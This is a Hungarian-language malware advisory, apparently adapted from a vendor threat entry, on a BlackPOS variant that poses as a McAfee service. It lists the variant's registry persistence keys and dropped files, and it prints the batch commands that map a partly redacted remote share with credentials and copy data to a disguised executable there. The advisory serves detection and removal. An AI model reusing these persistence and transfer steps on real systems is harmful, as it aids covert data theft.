Összefoglaló
Ez a kártékony program a BlackPOS új variánsa, melynek célpontjai főként lakossági bankszámlák. A program egy antivírus szoftver szolgáltatásának álcázza magát, így rejtőzködve a számítógépen.
Ez a kémprogram egyéb kártékony kód letöltéseként, vagy egy fertőzött weboldal látogatásával kerül a számítógépre.
Leírás
A kémprogram bemásolja a következő komponens állományokat:
- {malware path}t.bat – végrehajtás után törlésre kerül
- t:tempdotnetNDP45-KB2737084-x86.exe – a McTrayErrorLogging.dll file bizonyos részeit tartalmazza
- {malware path}McTrayErrorLogging.dll – a memória bizonyos részeit tartalmazza
A program regisztrálja magát egy rendszer szolgáltatásként, hogy biztosítsa az automatikus végrehajtását minden rendszerindításkor, ezért létrehozza az alábbi regisztrációs bejegyzéseket:
- HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcImagePath = “{malware path and filename} -service”
- HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcDisplayName = “McAfee Framework Management Instrumentation”
- HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcObjectName = “LocalSystem”
- HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcStart = “2”
- HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcType = “10”
- HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcErrorControl = “1”
- HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcDescription = “Provides systems management information to and from McAfee Framework Objects”
- HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcSecuritySecurity = “{value}”
- HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanworkstationDependOnService = “mcfmisvc”
A program regisztrálja magát egy rendszer szolgáltatásként, hogy biztosítsa az automatikus végrehajtását minden rendszerindításkor, ezért létrehozza az alábbi regisztrációs kulcsot:
- HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvc
A kémprogram a következő utasításokat ismeri:
- -start
- -stop
- -install
- -uninstall
- -service
Beolvassa a memóriában található összes folyamatot, kivéve az alábbiakat:
- smss.exe
- csrss.exe
- wininit.exe
- services.exe
- lsass.exe
- svchost.exe
- winlogon.exe
- sched.exe
- spoolsv.exe
- System
- conhost.exe
- ctfmon.exe
- wmiprvse.exe
- mdm.exe
- taskmgr.exe
- explorer.exe
- RegSrvc.exe
- firefox.exe
- chrome.exe
A t.bat komponens bemásolja a McTrayErrorLogging.dll tartalmát a t:tempdotnetNDP45-KB2737084-x86.exe fájlba. Ezt a támadó arra használja, hogy hozzáférést kapjon a megosztott géphez egy adott felhasználón keresztül, hogy fájlt küldhessen át.
A következő parancsokat tartalmazza:
set src=t:tempdotnetNDP45-KB2737084-x86.exe
net use t: \{BLOCKED}.{BLOCKED}.2.153d$ {BLOCKED}! /user:{BLOCKED}0.{BLOCKED}4.2.{BLOCKED}3{BLOCKED}1
if exist %src% (
type McTrayErrorLogging.dll >> t:tempdotnetNDP45-KB2737084-x86.exe.del /F /Q McTrayErrorLogging.dll
)
net use t: /DEL /yes
del /F /Q t.bat
A kémprogramot a következő neveken tartják még nyílván: Troj/Agent-AING (Sophos), W32/Zbot.QB.gen!Eldorado (FProt), Trojan-FEJZ!B57C5B49DAB6 (McAfee)
Megoldás
Frissítse az antivírus szoftverét.
Az eltávolításhoz szükséges információk a hivatkozásban találhatók.
Támadás típusa
Information disclosure (Információ/adat szivárgás)Hatás
Loss of confidentiality (Bizalmasság elvesztése)Szükséges hozzáférés
Remote/Network (Távoli/hálózat)Hivatkozások
Gyártói referencia: about-threats.trendmicro.com
